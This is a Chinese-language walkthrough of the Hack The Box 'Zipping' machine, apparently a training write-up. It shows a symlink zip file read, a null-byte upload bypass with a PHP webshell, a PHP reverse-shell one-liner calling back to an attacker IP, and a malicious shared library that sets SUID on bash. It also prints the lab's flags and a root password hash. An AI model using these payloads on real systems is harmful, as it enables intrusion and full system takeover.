先扫描靶机
# nmap -sC -sV -Pn 10.10.11.229
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 11:50 CST
Nmap scan report for 10.10.11.229
Host is up (0.34s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu7.3 (Ubuntu Linux; protocol 2.0)
ssh-hostkey:
256 9d:6e:ec:02:2d:0f:6a:38:60:c6:aa:ac:1e:e0:c2:84 (ECDSA)
256 eb:95:11:c7:a6:fa:ad:74:ab:a2:c5:f6:a4:02:18:41 (ED25519)
open http Apache httpd 2.4.54 ((Ubuntu))
Zipping | Watch store :
Apache/2.4.54 (Ubuntu) :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds
进入公司,可以看简介,大概知道该公司是一家男女手表制造商,对其进行目录fuzz
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.11.229/-_23-09-06_11-58-22.txt
Error Log: /root/.dirsearch/logs/errors-23-09-06_11-58-22.log
Target: http://10.10.11.229/
[ ] Starting:
[403 - 277B - /.ht_wsr.txt ]
[403 - 277B - /.htaccess_orig ]
[403 - 277B - /.htaccess.orig ]
[403 - 277B - /.htaccess_extra ]
[403 - 277B - /.htaccess.bak1 ]
[403 - 277B - /.htaccess.save ]
[403 - 277B - /.htaccess_sc ]
[403 - 277B - /.htaccessOLD2 ]
[403 - 277B - /.htaccessBAK ]
[403 - 277B - /.html ]
[403 - 277B - /.htaccess.sample ]
[403 - 277B - /.htaccessOLD ]
[403 - 277B - /.httr-oauth ]
[403 - 277B - /.htpasswd_test ]
[403 - 277B - /.htm ]
[403 - 277B - /.htpasswds ]
[403 - 277B - /.php ]
[301 - 313B - /assets -> http://10.10.11.229/assets/ ]
[200 - 2KB - /assets/ ]
[200 - 16KB - /index.php ]
[200 - 16KB - /index.php/login/ ]
[403 - 277B - /server-status ]
[403 - 277B - /server-status/ ]
[301 - 311B - /shop -> http://10.10.11.229/shop/ ]
[200 - 5KB - /upload.php ]
[403 - 277B - /uploads/ ]
[301 - 314B - /uploads -> http://10.10.11.229/uploads/ ]
Task Completed
扫出了upload地址,该网站有上传的功能,该功能只能上传zip格式的文件,我们可以创建一个symlink并将其压缩以读取服务器上的文件,有个LFI漏洞
ln -s ../../../../../../../etc/passwd passwd.pdf
zip --symlinks passwd.zip passwd.pdf
上传后,然后点击生成pdf的路径,抓包
可以通过这个LFI漏洞读取upload.php的代码
<html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="Start your development with Creative Design landing page.">
<meta name="author" content="Devcrud">
<title>Zipping | Watch store</title>
<!-- font icons -->
<link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">
<!-- Bootstrap + Creative Design main styles -->
<link rel="stylesheet" href="assets/css/creative-design.css">
</head>
<body data-spy="scroll" data-target=".navbar" data-offset="40" id="home">
<!-- Page Header -->
<header class="header header-mini">
<div class="header-title">Work with Us</div>
<nav aria-label="breadcrumb">
<ol class="breadcrumb">
<li class="breadcrumb-item"><a href="index.php">Home</a></li>
<li class="breadcrumb-item active" aria-current="page">Work with Us</li>
</ol>
</nav>
</header> <!-- End Of Page Header -->
<section id="work" class="text-center">
<!-- container -->
<div class="container">
<h1>WORK WITH US</h1>
<p class="mb-5">If you are interested in working with us, do not hesitate to send us your curriculum.<br> The application will only accept zip files, inside them there must be a pdf file containing your curriculum.</p>
if(isset($_POST['submit'])) {
// Get the uploaded zip file
$zipFile = $_FILES['zipFile']['tmp_name'];
if ($_FILES["zipFile"]["size"] > 300000) {
echo "<p>File size must be less than 300,000 bytes.</p>";
} else {
// Create an md5 hash of the zip file
$fileHash = md5_file($zipFile);
// Create a new directory for the extracted files
$uploadDir = "uploads/$fileHash/";
// Extract the files from the zip
$zip = new ZipArchive;
if ($zip->open($zipFile) === true) {
if ($zip->count() > 1) {
echo '<p>Please include a single PDF file in the archive.<p>';
} else {
// Get the name of the compressed file
$fileName = $zip->getNameIndex(0);
if (pathinfo($fileName, PATHINFO_EXTENSION) === "pdf") {
mkdir($uploadDir);
echo exec('7z e '.$zipFile. ' -o' .$uploadDir. '>/dev/null');
echo '<p>File successfully uploaded and unzipped, a staff member will review your resume as soon as possible. Make sure it has been uploaded correctly by accessing the following path:</p><a href="'.$uploadDir.$fileName.'">'.$uploadDir.$fileName.'</a>'.'</p>';
} else {
echo "<p>The unzipped file must have a .pdf extension.</p>";
}
}
} else {
echo "Error uploading file.";
}
}
}
<!-- Submit File -->
<form id="zip-form" enctype="multipart/form-data" method="post" action="upload.php">
<div class="mb-3">
<input type="file" class="form-control" name="zipFile" accept=".zip">
</div>
<button type="submit" class="btn btn-primary" name="submit">Upload</button>
</form><!-- End submit file -->
</div><!-- End of Container-->
</section><!-- End of Contact Section -->
<!-- Section -->
<section class="pb-0">
<!-- Container -->
<div class="container">
<!-- Pre footer -->
<div class="pre-footer">
<ul class="list">
<li class="list-head">
<h6 class="font-weight-bold">ABOUT US</h6>
</li>
<li class="list-body">
<p>Zipping Co. is a company that is dedicated to producing high-quality watches that are both stylish and functional. We are constantly pushing the boundaries of what is possible with watch design and are known for their commitment to innovation and customer service.</p>
<a href="#"><strong class="text-primary">Zipping</strong> <span class="text-dark">Watch Store</span></a>
</li>
</ul>
<ul class="list">
<li class="list-head">
<h6 class="font-weight-bold">USEFUL LINKS</h6>
</li>
<li class="list-body">
<div class="row">
<div class="col">
<a href="#">Link 1</a>
<a href="#">Link 2</a>
<a href="#">Link 3</a>
<a href="#">Link 4</a>
</div>
<div class="col">
<a href="#">Link 5</a>
<a href="#">Link 6</a>
<a href="#">Link 7</a>
<a href="#">Link 8</a>
</div>
</div>
</li>
</ul>
<ul class="list">
<li class="list-head">
<h6 class="font-weight-bold">CONTACT INFO</h6>
</li>
<li class="list-body">
<p>Contact us and we'll get back to you within 24 hours.</p>
<p><i class="ti-location-pin"></i> 12345 Fake ST NoWhere AB Country</p>
<p><i class="ti-email"></i> [email protected]</p>
<div class="social-links">
<a href="javascript:void(0)" class="link"><i class="ti-facebook"></i></a>
<a href="javascript:void(0)" class="link"><i class="ti-twitter-alt"></i></a>
<a href="javascript:void(0)" class="link"><i class="ti-google"></i></a>
<a href="javascript:void(0)" class="link"><i class="ti-pinterest-alt"></i></a>
<a href="javascript:void(0)" class="link"><i class="ti-instagram"></i></a>
<a href="javascript:void(0)" class="link"><i class="ti-rss"></i></a>
</div>
</li>
</ul>
</div><!-- End of Pre footer -->
<!-- foooter -->
<footer class="footer">
<p>Made by <a href="https://github.com/xdann1">xDaNN1</p>
</footer><!-- End of Footer-->
</div><!--End of Container -->
</section><!-- End of Section -->
</body>
</html>
这里就是产生LFI漏洞的原因
该代码检查提取的文件是否具有pdf扩展名,我们可以尝试注入一个空字节�0来终止php之后的字符串,但是pathinfo()函数还是以pdf形式返回,首先创建一个php文件测试,然后使用zip压缩
https://book.hacktricks.xyz/pentesting-web/file-upload#bypass-file-extensions-checks
echo "jinitaimei";
zip null.zip test.phpX.pdf
接下来使用hexeditor工具来修改压缩包,修改58字节,修改成�0
修改后然后保存,上传到靶机,先把后面.pdf去除,可以得到php的内容
用同样的办法,修改php文件上传shell,记得转换url编码
if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }
php -r '$sock=fsockopen("10.10.14.5",4444);shell_exec("/bin/bash <&3 >&3 2>&3");'
成功拿到shell,该靶场有定时删除文件的功能
拿到user flag:ee453eace87abef17b87c0608c81874e,输入sudo -l查看提权特性
rektsu@zipping:/home/rektsu$ sudo -l
sudo -l
Matching Defaults entries for rektsu on zipping:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User rektsu may run the following commands on zipping:
(ALL) NOPASSWD: /usr/bin/stock
rektsu@zipping:/home/rektsu$
运行strings命令查看可以显示密码
rektsu@zipping:/home/rektsu$ strings /usr/bin/stock
strings /usr/bin/stock
/lib64/ld-linux-x86-64.so.2
mgUa
fgets
stdin
puts
exit
fopen
__libc_start_main
fprintf
dlopen
__isoc99_fscanf
__cxa_finalize
strchr
fclose
__isoc99_scanf
strcmp
__errno_location
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
Hakaize
St0ckM4nager
/root/.stock.csv
Enter the password:
Invalid password, please try again.
================== Menu ==================
1) See the stock
2) Edit the stock
3) Exit the program
Select an option:
You do not have permissions to read the file
File could not be opened.
================== Stock Actual ==================
Colour Black Gold Silver
Amount %-7d %-7d %-7d
Quality Excelent Average Poor
Amount %-9d %-7d %-4d
Exclusive Yes No
Amount %-4d %-4d
Warranty Yes No
================== Edit Stock ==================
Enter the information of the watch you wish to update:
Colour (0: black, 1: gold, 2: silver):
Quality (0: excelent, 1: average, 2: poor):
Exclusivity (0: yes, 1: no):
Warranty (0: yes, 1: no):
Amount:
Error: The information entered is incorrect
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d
The stock has been updated correctly.
;*3$"
GCC: (Debian 12.2.0-3) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
stock.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
__errno_location@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__isoc99_fscanf@GLIBC_2.7
puts@GLIBC_2.2.5
stdin@GLIBC_2.2.5
_edata
fclose@GLIBC_2.2.5
_fini
strchr@GLIBC_2.2.5
fgets@GLIBC_2.2.5
__data_start
strcmp@GLIBC_2.2.5
dlopen@GLIBC_2.34
fprintf@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
checkAuth
_end
__bss_start
main
fopen@GLIBC_2.2.5
__isoc99_scanf@GLIBC_2.7
exit@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
rektsu@zipping:/home/rektsu$
密码是:St0ckM4nager
只要输入了正确的密码,可执行文件用于查看和修改位于/root/.stock.csv的库存,然后使用strace,对stock文件进行解析
rektsu@zipping:/usr/bin$ strace ./stock
strace ./stock
execve("./stock", ["./stock"], 0x7fffc46a3500 /* 16 vars */) = 0
brk(NULL) = 0x55ba794bb000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fff80acc340) = -1 EINVAL (Invalid argument)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f67a950f000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 4
newfstatat(4, "", {st_mode=S_IFREG|0644, st_size=18225, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 18225, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f67a950a000
close(4) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 4
read(4, "177ELF2113��������3�>�1���32062�����"..., 832) = 832
pread64(4, "6���4���@�������@�������@�������"..., 784, 64) = 784
newfstatat(4, "", {st_mode=S_IFREG|0644, st_size=2072888, ...}, AT_EMPTY_PATH) = 0
pread64(4, "6���4���@�������@�������@�������"..., 784, 64) = 784
mmap(NULL, 2117488, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f67a9200000
mmap(0x7f67a9222000, 1544192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x22000) = 0x7f67a9222000
mmap(0x7f67a939b000, 356352, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x19b000) = 0x7f67a939b000
mmap(0x7f67a93f2000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x1f1000) = 0x7f67a93f2000
mmap(0x7f67a93f8000, 53104, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f67a93f8000
close(4) = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f67a9507000
arch_prctl(ARCH_SET_FS, 0x7f67a9507740) = 0
set_tid_address(0x7f67a9507a10) = 3332
set_robust_list(0x7f67a9507a20, 24) = 0
rseq(0x7f67a9508060, 0x20, 0, 0x53053053) = 0
mprotect(0x7f67a93f2000, 16384, PROT_READ) = 0
mprotect(0x55ba77512000, 4096, PROT_READ) = 0
mprotect(0x7f67a9545000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7f67a950a000, 18225) = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0
getrandom("xeaxb9xf4x36x03x6fxa2x87", 8, GRND_NONBLOCK) = 8
brk(NULL) = 0x55ba794bb000
brk(0x55ba794dc000) = 0x55ba794dc000
newfstatat(0, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0
write(1, "Enter the password: ", 20Enter the password: ) = 20
read(0, St0ckM4nager
St0ckM4nager
"St0ckM4nagern", 1024) = 13
openat(AT_FDCWD, "/home/rektsu/.config/libcounter.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
write(1, "n================== Menu ======="..., 44
================== Menu ==================
) = 44
write(1, "n", 1
) = 1
write(1, "1) See the stockn", 171) See the stock
) = 17
write(1, "2) Edit the stockn", 182) Edit the stock
) = 18
write(1, "3) Exit the programn", 203) Exit the program
) = 20
write(1, "n", 1
上面显示正在调用libcounter.so,我们可以访问该路径/home/rektsu/.config/,可以创建一个恶意libcounter.so并放在那里
C语言提权
void _init() {
setuid(0);
setgid(0);
system("chmod u+s /bin/bash");
}
gcc -shared -fPIC -nostartfiles -o libcounter.so lib.c
然后上传到/home/rektsu/.config/里面,再运行文件
bash-5.2$ sudo /usr/bin/stock
Enter the password: St0ckM4nager
================== Menu ==================
1) See the stock
2) Edit the stock
3) Exit the program
Select an option: 3
bash-5.2$ /bin/bash -p
bash-5.2# id
uid=1001(rektsu) gid=1001(rektsu) euid=0(root) groups=1001(rektsu)
bash-5.2#
成功拿到root flag:db3ce5545891c0a6c87c229352495f5a
root:$y$j9T$IYa44JPNfCWV4rqT1W1Kj/$xiHZCNOyiAOLgnHZ06gdF9jWPNR9ixmhsCwFu0Hgy9/:19548:0:99999:7:::
国外大佬的一键拿user flag
import os
from bs4 import BeautifulSoup
import requests
if not os.path.exists("tmp"):
os.mkdir("tmp")
file_to_read = input("File to read: ")
print("Creating symlink..")
os.chdir("tmp/")
os.system(f"ln -s {file_to_read} symlink.pdf")
print("Zipping..")
os.system(f"zip -r --symlinks sym.zip symlink.pdf")
os.system(f"rm symlink.pdf && cp sym.zip ../")
print("Done! Zip file: sym.zip")
print("Uploading file..")
MIP = "10.10.11.229"
file = {
'zipFile': ('sym.zip', open('sym.zip','rb'),
'application/zip'),
'submit': (None,'')
}
headers = {"Host":MIP,"User-Agent":"Mozilla/5.0 (X11;Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"}
s = requests.Session()
r = s.get(f"http://{MIP}",headers=headers)
r = s.get(f"http://{MIP}/upload.php", headers=headers)
r = s.post(f"http://{MIP}/upload.php",files=file,headers=headers)
soup = BeautifulSoup(r.text,features="lxml")
uuid=""
for a in soup.find_all("a",href=True):
if "uploads" in a['href']:
uuid = a['href'].split("/")[1]
print("File UUID: ",uuid)
print("nReading file..")
r = s.get(f"http://{MIP}/uploads/{uuid}/symlink.pdf")
print(r.text)
原文始发于微信公众号(hades zorejt):HTB-Zipping笔记
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论